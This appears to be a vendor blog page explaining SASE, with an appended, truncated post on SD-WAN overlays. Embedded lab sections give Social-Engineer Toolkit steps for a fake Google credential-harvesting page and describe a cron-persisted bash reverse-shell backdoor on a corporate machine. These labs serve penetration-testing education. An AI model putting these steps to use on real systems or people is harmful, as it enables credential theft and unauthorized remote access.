rsz_secure_access_service_edge1

SASE Definition

SASE Definition

In today's digital landscape, organizations constantly seek ways to enhance network security, simplify infrastructure, and optimize performance. One emerging concept that has gained significant attention is Secure Access Service Edge (SASE). In this blog post, we will delve into the definition of SASE, its key components, and how it can revolutionize how businesses approach network and security architecture.

Secure Access Service Edge (SASE) is a transformative network architecture model that combines network and security services into a unified cloud-native solution. It offers a holistic approach to networking, allowing organizations to connect securely to cloud resources, applications, and data centers, regardless of their location or the devices being used.

Table of Contents

Highlights: SASE Definition

Multiple network and security functions 

SASE definition, or Secure Access Service Edge, is a modern networking solution that combines multiple security functions into a single platform. This solution is designed to provide secure access to cloud-based applications, data, and services. SASE architecture is built on top of a cloud-native platform that integrates software-defined wide-area networking (SD-WAN) and security functions like secure web gateway (SWG), cloud access security broker (CASB), firewall as a service (FWaaS), zero-trust network access (ZTNA).

Traditional complex methods

SASE meaning is becoming increasingly popular among organizations because it provides a more flexible and cost-effective approach to networking and security. The traditional approach to networking and security involves deploying multiple devices or appliances, each with its own set of functions. This approach can be complex, time-consuming, and expensive to manage. On the other hand, SASE simplifies this process by integrating all the necessary functions into a single platform.

SASE: A scalable approach

SASE also provides a more scalable and adaptable solution for organizations adopting cloud-based applications and services. With SASE, organizations can connect to cloud-based platforms like AWS, Azure, or Google Cloud, ensuring secure data and application access. Additionally, SASE provides better visibility and control over network traffic, allowing organizations to monitor and manage their network more effectively.

SASE definition

Related: For additional pre-information, you may find the following helpful for pre-information:

  1. SD-WAN SASE
  2. SASE Solution
  3. Security Automation
  4. SASE Model
  5. Cisco Secure Firewall
  6. eBOOK on SASE



SASE Definition

Key SASE Meaning Discussion Points:


  • New phase of WAN transformation.

  • WAN challenges and how SASE solves them.

  • Challenge: Managing the network.

  • Challenge: Site connectivity.

  • Challenge: Site performance.

  • Challenge: Cloud agility.

  • Challenge: Security.

Vendor Example: Cisco Umbrella

The Power of Secure Access Service Edge (SASE)

One of the key concepts associated with Cisco Umbrella is Secure Access Service Edge (SASE). SASE combines network security and wide-area networking (WAN) capabilities into a single cloud-native service. By converging multiple security functions such as secure web gateways, firewall-as-a-service, and data loss prevention, SASE provides a unified and simplified approach to network security. Cisco Umbrella is crucial in the SASE framework by seamlessly integrating cloud security services with the network.

Key Features and Benefits

Cisco Umbrella offers a range of powerful features that enhance network security. These include threat intelligence, advanced malware protection, secure internet gateway, and DNS-layer security. By leveraging the power of machine learning and data analytics, Umbrella continuously analyzes global internet activity to identify and block threats in real-time. Moreover, its intuitive dashboard gives administrators granular visibility and control over network traffic, enabling them to make informed decisions and respond swiftly to potential threats.

Cisco Umbrella
Diagram: Cisco Umbrella. Source is Cisco

SASE: A Cloud-Centric Approach

Firstly, the SASE meaning is down to the environment that we are in. In a cloud-centric world, users and devices require access to services everywhere. The focal point has changed. Now, the identity of the user and device, as opposed to the traditional model, focuses solely on the data center with many network security components. These environmental changes have created a new landscape we must protect and connect.

Many common problems challenge the new landscape. Due to deployed appliances for different technology stacks, enterprises are loaded with complexity and overhead. The legacy network and security designs increase latency. In addition, the world is encrypted when considering Zero Trust SASE. This needs to be inspected without degrading application performance.

These are reasons to leverage a cloud-delivered secure access service edge (SASE). SASE means a tailored network fabric optimized where it makes the most sense for the user, device, and application – at geographically dispersed PoPs enabling technologies that secure your environment with technologies such as single packet authorization.

SASE explained
Diagram: SASE explained. Source Fortinet.

SASE Meaning

Main SASE Definition Components

SASE – Secure Access Service Edge

  • Network as a Service (NaaS)

  • Security as a Service (SECaaS)

  • Zero-Trust Architecture

  • Cloud-Native Architecture

Components of SASE:

1. Network as a Service (NaaS): SASE integrates network services such as SD-WAN (Software-Defined Wide Area Network) and cloud connectivity to provide organizations with a flexible and scalable network infrastructure. With NaaS, businesses can optimize network performance, reduce latency, and ensure reliable connectivity across different environments.

2. Security as a Service (SECaaS): SASE incorporates various security services, including secure web gateways, firewall-as-a-service, data loss prevention, and zero-trust network access. By embedding security into the network infrastructure, SASE enables organizations to enforce consistent security policies, protect against threats, and simplify the management of security measures.

3. Zero-Trust Architecture: SASE adopts a zero-trust approach, which assumes that no user or device should be trusted by default, even within the network perimeter. By implementing continuous authentication, access controls, and micro-segmentation, SASE ensures that every user and device is verified before accessing network resources, reducing the risk of unauthorized access and data breaches.

4. Cloud-Native Architecture: SASE leverages cloud-native technologies to provide a scalable, agile, and elastic network and security infrastructure. By transitioning from legacy hardware appliances to software-defined solutions, SASE enables organizations to respond more to changing business requirements, reduce costs, and improve overall efficiency.

Benefits of SASE:

1. Enhanced Security: By integrating security into the network infrastructure, SASE provides a unified and consistent security approach across all network edges, reducing potential vulnerabilities and simplifying security management.

2. Increased Agility: SASE enables organizations to adapt quickly to changing business requirements by providing on-demand network and security services that can be rapidly provisioned and scaled.

3. Improved User Experience: With SASE, users can securely access applications and resources from anywhere, on any device, without compromising performance or experiencing network congestion.

4. Cost Savings: By consolidating network and security services into a single cloud-native solution, organizations can reduce hardware and maintenance costs, streamline their infrastructure, and optimize resource utilization.

Secure Access Service Edge

SASE Advantages

Cloud Delivered: Network and Security

  • Unified and consitent security to all edges. 

  • Increased agility with on-demand network and security services

  • Improved user experience. Same access from all locations.

  • Cost savings with a single cloud-native solution.

Secure Access Service Edge

SASE Technologies

Cloud Delivered: Network and Security

  • SD-WAN

  • Cloud Access Security Broker (CASB)

  • NGFW and Firewall as a service

  • Zero Trust Network Access (ZTNA)

  • Secure Web Gateway (SWG)

 

Lab Guide: Phishing Attacks

The Social-Engineer Toolkit (SET)

In this lab, we have a fake Google login page that we can use to capture the username and password. This process is known as phishing, and here, I will use the Social-Engineer Toolkit (SET), specifically designed to perform advanced attacks against the human element. 

Note:

SET was designed to be released with the http://www.social-engineer.org launch and has quickly become a standard tool in a penetration tester arsenal. The attacks built into the toolkit are intended to be focused attacks against a person or organization used during a penetration test. There are a couple of steps to perform, and I’m using Kali Linux.

  1. Once the Social Engineering Toolkit loads, select 1) Social-Engineering Attacks from the menu. 
  2. Select 2) Website Attack Vectors from the following menu. 
  3. Select 3) Credential Harvester Attack Method from the following menu. 
  4. Select 1) Web Templates method from next to the menu. 
  5. The following prompt will ask for your IP address for the POST request. The default IP [xx.xx.xx.xx] is correct, so hit Enter here.
  6. Next, select the 2—Google template. 

The credential harvester attack is a phishing attack where attackers create deceptive websites or emails to trick unsuspecting victims into providing their login credentials. These malicious actors often mimic legitimate websites or services, luring users into entering their usernames, passwords, or other sensitive information.

Techniques Employed by Credential Harvesters

Credential harvesters employ various techniques to make their attacks more convincing. They may use URL manipulation, where the website’s URL appears genuine, but in reality, it redirects to a fraudulent page designed to capture user credentials. Another method involves creating spoofed emails with links that lead to imitation login pages.

Consequences of Falling Victim to Credential Harvesters

The consequences of falling victim to credential harvesters can be severe. Once attackers obtain login credentials, they can gain unauthorized access to personal accounts, financial information, or corporate networks. This can result in identity theft, financial loss, reputational damage, and compromised privacy.

Analysis: 

    • This is an effortless way for attackers to use malicious links inside emails, texts, or social media messages. If those links are clicked, it directs the user to a fake login page to capture their credentials! 
    • Fortunately, there are several preventive measures individuals and organizations can take to safeguard against credential harvester attacks. Implementing robust and unique passwords, enabling two-factor authentication, and regularly updating software and security patches are effective ways to enhance security.
    • Additionally, being cautious of unsolicited emails, scrutinizing URLs before entering credentials, and educating oneself about phishing techniques can significantly reduce the risk of falling victim to such attacks.

In conclusion, the credential harvester attack method poses a significant threat to individuals and organizations. By understanding the techniques employed by attackers, being aware of the consequences, and implementing preventive measures, we can fortify our defenses against these malicious activities. Remember, staying vigilant and practicing good cybersecurity hygiene is the key to staying one step ahead of cybercriminals.

Back to Basics: SASE Definition

Generally, SASE services include SD-WAN, Zero-Trust Network Access (ZTNA), Cloud Access Security Broker (CASB), NGFW, Secure Web Gateway (SWG), unified management, and orchestration. Just what constitutes a real SASE solution varies significantly by source.

Several organizations, such as the Metro Ethernet Forum (MEF), are trying to establish neutral industry standards for SASE. These standards will pave the way for a universal understanding, the ability to integrate multiple manufacturers into a solution, and a method for teaching SASE.

the rise of sase
Diagram: Cloud-native application security. The rise of SASE.

SASE Meaning

The rise of SASE and digital transformation

There has been a loss of confidence in the network. As a result, organizations uncover weaknesses in their networks when they roll out digital initiatives. This seems to be true for MPLS backbones and in some SD-WAN designs, where there is a lag in security, cloud connectivity, mobility, and site connectivity.

Confidence in SD-WAN and MPLS has significantly decreased when confronted with the digital structure of network transformation. Intrinsically, SD-WAN is not an all-in-one-encompassing solution, whereas MPLS is rigid and fixed.

MPLS forwarding
Diagram: MPLS Overlay

It is expected to find that they were more confident in their networks before adopting digital transformation than post-digital transformations. Therefore, it is difficult to predict the impact of digital change on networks. Enterprises must ensure they have the proper infrastructure performance and security levels. Digital transformation is not just about replacing MPLS. Networking professionals must broaden their focus to encompass security, cloud, and mobility.

sase definition
Diagram: SASE definition. They are driving digital transformation.

WAN Transformation

SASE Meaning

All these problems can be avoided by switching to SASE, a new enterprise networking technology category introduced by Gartner in 2019. SASE meaning is the convergence of security, cloud connectivity, mobility, and site connectivity, enabling the architecture to correlate disparate data points.

It is an all-in-one encompassing solution that provides a ready-made solution for the WAN transformation journey. Gartner expects at least 40% of enterprises to have explicit strategies to adopt SASE by 2024.

Today, customers are looking for a WAN transformation solution that connects and secures all edges – sites, cloud resources, mobile users, and anything else that might emerge tomorrow. MPLS is not the right approach, and some SD-WAN deployments are causing question marks. So, a SASE definition, on the other hand, significantly assists post-digital transformation.

So, let us shine the torch on some of the digital transformation challenges likely to surface. These challenges include complexity with management and operations, site connectivity, performance between locations, inefficient security, and cloud agility.

SASE definition
Diagram: SASE: Combining network and security.

SASE Definition: Secure Access Service Edge (SASE)

The SASE definition combines network security functions (such as SWG, CASB, FWaaS, and Zero Trust Network Access (ZTNA) with SD-WAN to support organizations’ dynamic, secure access needs. These capabilities are primarily delivered by XaaS and are based on the entity’s identity, real-time context, and security/compliance policies.

SASE changes the focal point to the identity of the user and device. With traditional network design, this was the on-premises data center. The conventional enterprise network and network security architectures place the internal data center as the focal point for access.

These designs are proving ineffective and cumbersome with the rise of cloud and mobile. Traffic patterns have changed considerably, and so has the application logic.

  • A key point: “Software-defined” secure access

SASE consolidates networking and security-as-a-service capabilities into a cloud-delivered secure access service edge. The cloud-delivered service provides you with policy-based “software-defined” secure access. The “software-defined” secure access comprises a worldwide fabric of points of presence (POPs) and peering relationships. With the PoP design, the general architecture is to move inspection engines to the sessions, not reroute the engines’ sessions as traditional techniques do. This design is more aligned with today’s traffic patterns and application logic.

        • SASE offers a tailorable network fabric comprising the SASE PoPs geographically dispersed.

The architecture allows you to accurately specify every network session’s performance, reliability, security, and cost. This is based on identity and context. For practical, secure access, decisions must be centered on the entity’s identity at the source of the connection. And not a traditional construct such as the IP address or mere network location. The requesting entity can be the user, device, branch office, IoT device, edge computing location, and policy based on these parameters.

 

Lab Guide: Identity-Aware-Proxy

Identity Security with Google Cloud

Next, we will have a look at Identity security and Google Cloud. Here, I have a  minimal web application with Google App Engine.  Then, an Identity-Aware Proxy (IAP) restricts access based on parameters that I can configure.

Note:

  1. An identity-aware proxy (IAP) is a Google Cloud service allowing fine-grained access control to applications and resources based on user identity. By integrating with Google Cloud Identity and Access Management (IAM), IAP enables organizations to define and enforce access policies easily.
  2. IAP provides a robust solution, whether protecting sensitive data or mitigating the risk of unauthorized access.

See below; I have enabled IAP for a simple application. For access, I now need to tell the IAP services who can access the application. I do this by adding Principles.

Once an app is protected with IAP, it can use the identity information that IAP provides in the web request headers it passes through. So, for additional identity information, the application will get the logged-in user’s email address and a persistent unique user ID assigned by the Google Identity Service to that user—notice below the additional lines in the application code that get the IAP-provided identity data. Additionally, the X-Goog-Authenticated-User- the IAP service provides headers.

Note:

If there is a risk of IAP being turned off or bypassed, your app can check to make sure the identity information it receives is valid. This uses a third web request header added by IAP called X-Goog-IAP-JWT-Assertion. The header’s value is a cryptographically signed object containing user identity data. Your application can verify the digital signature and use the data provided in this object to ensure that IAP provided it without alteration.

Digital signature verification requires several extra steps, such as retrieving the latest set of Google public keys. You can decide whether your application needs these additional steps based on the risk that someone can turn off or bypass IAP and the application’s sensitivity.

IAP Key Features and Benefits

a) Secure Access Control: IAP offers granular control over who can access specific resources, ensuring that only authorized individuals can gain entry. By leveraging context-aware access policies, organizations can define rules based on user attributes, device security status, and more.

b) Multi-Factor Authentication (MFA): IAP supports using MFA, adding an extra layer of security to the authentication process. The risk of unauthorized access is further reduced by requiring users to provide additional verification factors such as SMS codes or security keys.

c) Centralized Logging and Auditing: IAP provides detailed logs and audit trails, allowing organizations to monitor and track access attempts. This enhances visibility and enables swift action against potential security threats.

Implementing Identity-Aware Proxy

Implementing IAP within your Google Cloud environment is a straightforward process. By following these steps, you can ensure a seamless integration:

a) Enabling IAP: Start by enabling IAP in the Google Cloud Console for the desired project. This will activate the necessary APIs and services.

b) Configuring Access Policies: Define access policies based on user identity, resource paths, and other criteria using the Cloud Console or the IAP API.

c) Fine-tuning authentication Methods: Customize the authentication methods according to your organization’s security requirements. This includes enabling MFA and deciding whether to allow or deny unauthenticated users.

Conclusion: Identity-Aware Proxy (IAP) is a robust security solution offered by Google Cloud. With its granular access control, multi-factor authentication, and centralized logging capabilities, IAP provides organizations with the means to ensure secure access to their cloud resources. By implementing IAP, businesses can enhance their security posture and protect against potential threats.

Security and Identity

With a SASE platform, when we create an object, such as a policy in the networking domain, it is then available in other domains, such as security. So, any policies assigned to users are tied to that user regardless of network location. This removes the complexity of managing network and security policies across multiple areas, users, and devices. Again, all of this can be done from one platform.

Also, when examining security solutions, many buy individual appliances that focus on one job. To troubleshoot, you need to gather information, such as the logs from each device. A SIEM is valuable but can only be used in some organizations as a resource-heavy. For those who don’t have ample resources, the manual process is backbreaking, and there will be false positives.

sase security
Diagram: SASE security. The PoP architecture.

SASE Definition with Challenge 1: Managing the Network

Looking across the entire networking and security industry, everyone sells individual point solutions that are not a holistic joined-up offering. Thinking only about MPLS replacement leads to incremental, point solution acquisitions when confronted by digital initiatives, making their networks more complex and costly.

Principally, distributed appliances for network and security at every location require additional tasks such as installation, ongoing management, regular updates, and refreshes. This results in far too many security and network configuration points. We see this all the time with NOC and SOC integration efforts.

Numerous integration points

The point-solution approach addresses one issue and requires a considerable amount of integration. Therefore, you must constantly add solutions to the stack, likely resulting in management overhead and increased complexity. Let’s say you are searching for a new car. Would you prefer to build the car with all the different parts or buy the already-built one?

In the same way, if we examine the network and security industry, the way it has been geared up presently is provided in parts. It’s your job to support, manage, and build the stack over time and scale it when needed. Fundamentally, it would help if you were an expert in all the different parts.

However, if you abstract the complexity into one platform, you don’t need to be an expert in everything. SASE is one of the effective ways to abstract management and operational complexity.

SASE Meaning: How SASE solves this

Converging network and security into a single platform does not require multiple integration points. This will eliminate the need to deploy these point solutions and the complexities of managing each. Essentially, with SASE, we can bring each point solution functionalities together and place them under one hood – the SASE cloud. SASE merges all of the networking and security capabilities into a single platform.

This way, you now have a holistic joined-up offering. Customers don’t need to perform upgrades, size, and scale their network. Instead, all this is done for them in the SASE cloud, creating a fully managed and self-healing architecture.

Besides, the convergence is minimal if something goes wrong in one of the SASE Pops. All of this is automatic, and there is no need to set up new tunnels or have administrators step in to perform configurations.

sase definition
Diagram: SASE definition. No more point solutions.

SASE Definition with Challenge 2: Site Connectivity

SD-WAN appliances require other solutions for global connectivity and to connect, secure, and manage mobile users and cloud resources. As a result, many users are turning to Service Providers to handle the integration. The carrier-managed SD-WAN providers integrate a mix of SD-WAN and security devices to form SD-WAN services.

Unfortunately, this often makes the Service Providers inflexible in accommodating new requests. The telco’s lack of agility and high bandwidth costs will remain problematic. Deploying new locations has been the biggest telco-related frustration, especially when connecting offices outside of the telco’s operating region to the company’s MPLS network. For this, they need to integrate with other telcos.

Video: SD-WAN

In the following video, we will address the basics of SD-WAN and the challenges of the existing WAN. We will also go through popular features of SD-WAN and integration points with, for example, SASE.

SD WAN Tutorial
Prev 1 of 1 Next
Prev 1 of 1 Next

SASE Meaning: How SASE solves this

SASE handles all of the complexities of management. As a result, the administrative overhead for managing and operating a global network that supports site-to-site connectivity and enhanced security, cloud, and mobility is kept to an absolute minimum.

SASE Definition with Challenge 3: Performance Between Locations

The throughput is primarily determined by latency and packet loss, not bandwidth. Therefore, for an optimal experience for global applications, we must explore ways to manage the latency and packet loss end-to-end for last-mile and middle-mile segments. Most SD-WAN vendors don’t control these segments, affecting application performance and service agility.

Consequently, there will be constant tweaking at the remote ends to attain the best performance for your application. With SD-WAN, we can bundle transports and perform link bonding to solve the last mile. However, this does not create any benefits for the middle mile bandwidth.

MPLS will help you overcome the middle-mile problems, but you will likely pay a high price.

Define SASE
Diagram: Define SASE. Link Bonding is only suitable for last-mile performance.

SASE Meaning: How SASE solves this

The SASE cloud already has an optimized converged network and security platforms. Therefore, sites need to connect to the nearest SASE PoP. This way, the sites are placed on the global private backbone to take advantage of global route optimization, dynamic path selection, traffic optimization, and end-to-end encryption. The traffic can also be routed over MPLS, directly between sites (not through the SASE PoP), and from IPsec tunnels to third-party devices. The SASE architecture optimizes the last and middle-mile traffic flows.

Optimization techniques

The SASE global backbone has several techniques that improve the network performance, resulting in predictable, consistent latency and packet loss. The SASE cloud has complete control of each PoP and can employ optimizations. It uses proprietary routing algorithms that factor in latency, packet loss, and jitter.

These routing algorithms favor performance over cost and select the optimal route for every network packet. This is compared to Internet routing, where metrics don’t consider what is best for the application or the type.

SASE Definition with Challenge 4: Cloud Agility

Cloud applications are becoming the most critical to organizations, even more severe than those hosted in private data centers. When delivering cloud resources, we must consider more than just providing connectivity. In the past, when we spoke about agility, we were concerned only with the addition of new on-premises sites.

However, now, this conversation needs to encompass the cloud. Primarily, delivering cloud applications is about providing an application experience as responsive as the on-premises applications. However, most SD-WANs have a low response rate for rapidly offering new public cloud infrastructure. MPLS is expensive, rigid, and not built for cloud access.

SASE Meaning: How SASE solves this

Cloud Native Meaning

SASE natively supports cloud data centers (IaaS) and applications (SaaS) without additional configuration, complexity, or point solutions, enabling built-in cloud connectivity. This further enables the rapid delivery of new public cloud infrastructure.

The SASE PoPs are collocated in the data centers, directly connected to the IXP of the leading IaaS providers, such as Amazon AWS, Microsoft Azure, and Google Cloud Platform. In addition, cloud applications are optimized through SASE’s ability to define the egress points. This helps exit the cloud application traffic at the points closest to the customer’s application instance.

The optimal global routing algorithms can determine the best path from anywhere to the customer’s cloud application instance. This provides optimal performance to the cloud applications regardless of the user’s location.

So, when we talk about performance to the cloud with SASE, the latency to the cloud is comparable to the optimized access provided by the cloud providers, such as AWS Direct Connect or Azure Express Route. So, authentically, SASE provides out-of-the-box cloud performance.

SASE Definition with Challenge 5: Security

The security landscape is constantly evolving. Therefore, network security solutions must develop to form a well-founded landscape. Ransomware and Malware will continue to be the primary security concerns from 2020 onward. This is a challenge for the entire organization to combat the various solutions designed with complex integration points scattered through the network domain.

Security must be a part of any WAN transformation initiative protecting the users and resources regardless of the underlying network managed through a single-pane-of-glass.

However, a bundle of non-integrated security products results in appliance sprawl that hinders your security posture instead of strengthening it. The security solution must defend against emerging threats like malware/ransomware. In addition, it must boost the ability to enforce corporate security policies on mobile users.

Finally, the security solution must also address the increasing cost of buying and managing security appliances and software.

sase edge
Diagram: SASE Edge: The issues of service chaining.

Security and encryption

So, we know there is an increase in complexity due to the disparate tools required to address the different threat vectors. So, for example, we have DLP that can be spread across the SWG, CASB, and DLP but with three other teams managing each. What about the impact of encrypted web traffic on the security infrastructure?

The issue is that most internet traffic is now encrypted, and attackers deliver the payloads, deliver command and control instructions, and exfiltrate data over encrypted protocols. Organizations cannot decrypt all network traffic for performance reasons and avoid looking at sensitive employee information.

Also, there are issues with the scalability of encrypted traffic management solutions. This can, too, cause performance issues.

Lab Guide: Security Backdoors

Using Bash

Bash, short for “Bourne Again SHell,” is a widely used command-line interpreter in Unix-based systems. It provides powerful scripting capabilities, making it a favorite among system administrators and developers. However, this versatility also brings the potential for misuse. This section will explain what a Bash backdoor is and how it functions.

Note:

In the following, I created a backdoor on a corporate machine to maintain persistence within the environment. I performed bash script and system configuration using cron jobs. You will then connect to the created backdoor. Here, we demonstrate how to use tools available on standard operating system installations to bypass an organization’s security controls.

Cron jobs, derived from the word “chronos” meaning time in Greek, are scheduled tasks that run automatically in the background of your server. They follow a specific syntax, using fields to specify when and how often a task should be executed. You can create precise and reliable automated processes by grasping the structure and components of cron jobs.


Analysis: First, the file called file is deleted with the rm command if it already exists. Next, a special pipe, a new communications channel, is called a file. Any information passed to the bash terminal, such as typed commands, is transmitted to a specific IP address and port using the pipe. The | indicates the point at which the output from one Linux command passes information to the next command. Using this single line, you can create a network connection to a specific machine, giving remote access to a user.

Analysis: First, errors when running the cron task are ignored and not printed on the screen. Then, the new cronjob is printed to the screen; in this example, the backdoor bash shell will run every minute. The output of the echoed command is then written to the cronfile with crontab. 

Conclusion: 

Backdoor access refers to a hidden method or vulnerability intentionally created within a system or software that allows unauthorized access or control. It is an alternative entry point that bypasses conventional security measures, often undetected.

While backdoor access can be misused for malicious purposes, it is essential to acknowledge that there are legitimate reasons for its existence. Government agencies may utilize backdoor access to monitor criminal activities or ensure national security. Additionally, software developers may implement backdoor access for debugging and maintenance purposes.

Stringent security measures are necessary to counter the threats posed by backdoor access. Regular system audits, vulnerability assessments, and robust encryption protocols can help identify and patch potential vulnerabilities. Fostering a security-conscious culture among users and promoting awareness of potential risks can strengthen overall cybersecurity.

Video: Stateful Inspection Firewall

We know we have a set of well-defined protocols that are used to communicate over our networks. Let’s call these communication rules. You are probably familiar with the low-layer transport protocols, such as TCP and UDP, and higher application layer protocols, such as HTTP and FTP.

Generally, we interact directly with the application layer and have networking and security devices working at the lower layers. So when Host A wants to talk to Host B, it will go through a series of communication layers with devices working at each layer. A device that works at one of these layers is a stateful firewall.

Stateful Inspection Firewall
Prev 1 of 1 Next
Prev 1 of 1 Next

MPLS and SD-WAN

MPLS does not protect the resources and users, certainly not those connected to the Internet. On the other hand, SD-WAN service offerings are not all created equal since many do not include firewall/security features for threat protection to protect all edges – mobile devices, sites, and cloud resources. This lack of integrated security complicates SD-WAN deployments. Also, this often leads to Malware getting past the perimeter unnoticed.

The cost involved

Security solutions are expensive, and there is never a fixed price. Some security vendors may charge on the usage models for which you don’t yet have the quantity. This makes the process of planning extremely problematic and complex. As the costs keep increasing, we often find that security professionals would trade off point-security solutions due to the associated costs. This is not an effective risk-management strategy.

The security controls are also limited to mobile VPN solutions. More often than not, they are very coarse, forcing IT to open access to all the network resources. Protecting mobile users requires additional security tools like next-generation firewalls (NGFWs). So again, we have another point solution. In addition, mobile VPN solutions provide no last- or middle-mile optimization.

SASE Meaning: How SASE solves this

SASE converges a complete security stack into the network, allowing SASE to bring granular control to sites and mobile and cloud resources. This is done by enforcing the zero-trust principles for all edges. SASE provides anti-malware protection for both WAN and Internet traffic. In addition, for malware detection and prevention, SASE can offer signature and machine-based learning protection consisting of several integrated anti-malware engines.

For malware communication, SASE can stop the outbound traffic to C&C servers based on reputation feeds and network behavioral analysis. Mobile user traffic is fully protected by SASE’s advanced security services, including NGFW, secure web gateway (SWG), threat prevention, and managed threat detection and response.

Furthermore, in the case of mobile, SASE mobile users can dynamically connect to the closest SASE PoP regardless of the location. Again, as discussed previously, the SASE cloud’s relevant optimizations are available for mobile users.

Rethink the WAN

The shift to the cloud, edge computing, and mobility offer new opportunities for IT professionals. To support these digital initiatives, the network professionals must rethink their approach to the WAN transformation. WAN transformation is not just about replacing MPLS with SD-WAN. It needs an all-encompassing solution that provides the proper network performance and security level for enhanced site-to-site connectivity, security, mobile, and cloud.

network security solution
Diagram: SASE, a network security solution.

SASE Meaning: SASE wraps up

SASE is a network and security architecture consolidating numerous network and security functions, traditionally delivered as siloed point solutions, into an integrated cloud service. It combines several network and security capabilities along with cloud-native security functions. The functions are produced from the cloud and provided by the SASE vendor.

They are essentially providing a consolidated, platform-based approach to security. We have a cloud-delivered solution consolidating multiple edge network security controls and network services into a unified solution with centralized management and distributed enforcement.

The appliance-based perimeter

Even Though there has been a shift to the cloud, the traditional perimeter network security solution has remained appliance-based. The shift for moving security controls to the cloud is for better protection and performance, plus ease of deployment and maintenance.

The initial performance of the earlier cloud-delivered solutions has been overcome with the introduction of optimized routing and global footprint. However, there is a split in opinion about performance and protection. Many consider protection and performance prime reasons to remain on-premises and keep the network security solutions on-premises.

Key Components of SASE

The key components of SASE include software-defined wide-area networking (SD-WAN), cloud-native secure web gateways (SWG), zero-trust network access (ZTNA), firewall-as-a-service (FWaaS), and data loss prevention (DLP), among others. These components work harmoniously to provide organizations with a holistic and scalable solution for secure network connectivity, regardless of the location or device used by the end-user.

Benefits of SASE

SASE offers numerous benefits for organizations seeking to enhance their network infrastructure and security posture. Firstly, it provides simplified network management by consolidating various functions into a unified platform. Secondly, it offers an improved user experience through optimized connectivity and reduced latency. Additionally, SASE enables organizations to embrace cloud services securely and facilitates seamless scalability to adapt to changing business demands.

Implications for the Future

As businesses embrace digital transformation and remote work becomes more prevalent, the demand for flexible and secure network architectures like SASE is expected to skyrocket. SASE empowers organizations to overcome the limitations of traditional network setups and enables them to thrive in an increasingly dynamic and interconnected world. With its cloud-native approach and emphasis on security, SASE is poised to redefine how networks are designed and managed in the coming years.




Key SASE Definition Summary Points:

Main Checklist Points To Consider

  • The rise of SASE and the causes of digital transformation.

  • Technical details on the issues of MPLS with the lack of agility. 

  • Technical details on the SASE PoP and the converging of networking and security to a SaaS solution.

  • Discuss the numerous challenges of managing the network and how SASE solves this.

  • A final note on the appliance-based perimeter.

 

Summary: SASE Definition

With the ever-evolving landscape of technology and the increasing demand for secure and efficient networks, a new paradigm has emerged in the realm of network security – SASE, which stands for Secure Access Service Edge. In this blog post, we delved into the definition of SASE, its key components, and its transformative impact on network security.

Section 1: Understanding SASE

SASE, pronounced “sassy,” is a comprehensive framework that combines network security and wide area networking (WAN) capabilities into a single cloud-based service model. It aims to provide users with secure access to applications and data, regardless of their location or the devices they use. By converging networking and security functions, SASE simplifies the network architecture and enhances overall performance.

Section 2: The Key Components of SASE

To fully grasp the essence of SASE, it is essential to explore its core components. These include:

1. Secure Web Gateway (SWG): The SWG component of SASE ensures safe web browsing by inspecting and filtering web traffic, protecting users from malicious websites, and enforcing internet usage policies.

2. Cloud Access Security Broker (CASB): CASB provides visibility and control over data as it moves between the organization’s network and multiple cloud platforms. It safeguards against cloud-specific threats and helps enforce data loss prevention policies.

3. Firewall-as-a-Service (FWaaS): FWaaS offers scalable and flexible firewall protection, eliminating the need for traditional hardware-based firewalls. It enforces security policies and controls access to applications and data, regardless of their location.

4. Zero Trust Network Access (ZTNA): ZTNA ensures that users and devices are continuously authenticated and authorized before accessing resources. It replaces traditional VPNs with more granular and context-aware access policies, reducing the risk of unauthorized access.

Section 3: The Benefits of SASE

SASE brings numerous advantages to organizations seeking enhanced network security and performance:

1. Simplified Architecture: By consolidating various network and security functions, SASE eliminates the need for multiple-point solutions, reducing complexity and management overhead.

2. Enhanced Security: With its comprehensive approach, SASE provides robust protection against emerging threats, ensuring data confidentiality and integrity across the network.

3. Improved User Experience: SASE enables secure access to applications and data from any location, offering a seamless user experience without compromising security.

Conclusion:

In conclusion, SASE represents a paradigm shift in network security, revolutionizing how organizations approach their network architecture. By converging security and networking functions, SASE provides a comprehensive and scalable solution that addresses the evolving challenges of today’s digital landscape. Embracing SASE empowers organizations to navigate the complexities of network security and embrace a future-ready approach.

wan monitoring

SD WAN Overlay

SD WAN Overlay

In today's digital age, businesses rely on seamless and secure network connectivity to support their operations. Traditional Wide Area Network (WAN) architectures often struggle to meet the demands of modern companies due to their limited bandwidth, high costs, and lack of flexibility. A revolutionary SD-WAN (Software-Defined Wide Area Network) overlay has emerged to address these challenges, offering businesses a more efficient and agile network solution.

This blog post will delve into SD-WAN overlay, exploring its benefits, implementation, and potential to transform how businesses connect.

SD-WAN overlay is a network architecture that enhances traditional WAN infrastructure by leveraging software-defined networking (SDN) principles. Unlike traditional WAN, where network management is done manually and requires substantial hardware investments, SD-WAN overlay centralizes network control and management through software. This enables businesses to simplify network operations and reduce costs by utilizing commodity internet connections alongside existing MPLS networks.

SD-WAN, or Software-Defined Wide Area Network, is a technology that simplifies the management and operation of a wide area network. It abstracts the underlying network infrastructure and provides a centralized control plane for configuring and managing network services. SD-WAN overlay takes this concept further by introducing an additional layer of virtualization, enabling the creation of multiple logical networks on top of the physical network infrastructure.

Table of Contents

Highlights: SD WAN Overlay

SD WAN 

SD WAN Overlay 

Overlay Types

  • Tunnel-Based Overlays

  • Segment-Based Overlays

  • Policy-Based Overlays

  • Internet-Based SD-WAN Overlay

SD WAN 

SD WAN Overlay 

Overlay Types

  • Hybrid Overlays

  • Cloud-Enabled Overlays

  • MPLS-Based SD-WAN Overlay

  • Hybrid SD-WAN Overlay

So, what exactly is an SD-WAN overlay?

In simple terms, it is a virtual layer added to the existing network infrastructure. These network overlays connect different locations, such as branch offices, data centers, and the cloud, by creating a secure and reliable network.

1. Tunnel-Based Overlays:

One of the most common types of SD-WAN overlays is tunnel-based overlays. This approach encapsulates network traffic within a virtual tunnel, allowing it to traverse multiple networks securely. Tunnel-based overlays are typically implemented using IPsec or GRE (Generic Routing Encapsulation) protocols. They offer enhanced security through encryption and provide a reliable connection between the SD-WAN edge devices.

2. Segment-Based Overlays:

Segment-based overlays are designed to segment the network traffic based on specific criteria such as application type, user group, or location. This allows organizations to prioritize critical applications and allocate network resources accordingly. By segmenting the traffic, SD-WAN can optimize the performance of each application and ensure a consistent user experience. Segment-based overlays are particularly beneficial for businesses with diverse network requirements.

3. Policy-Based Overlays:

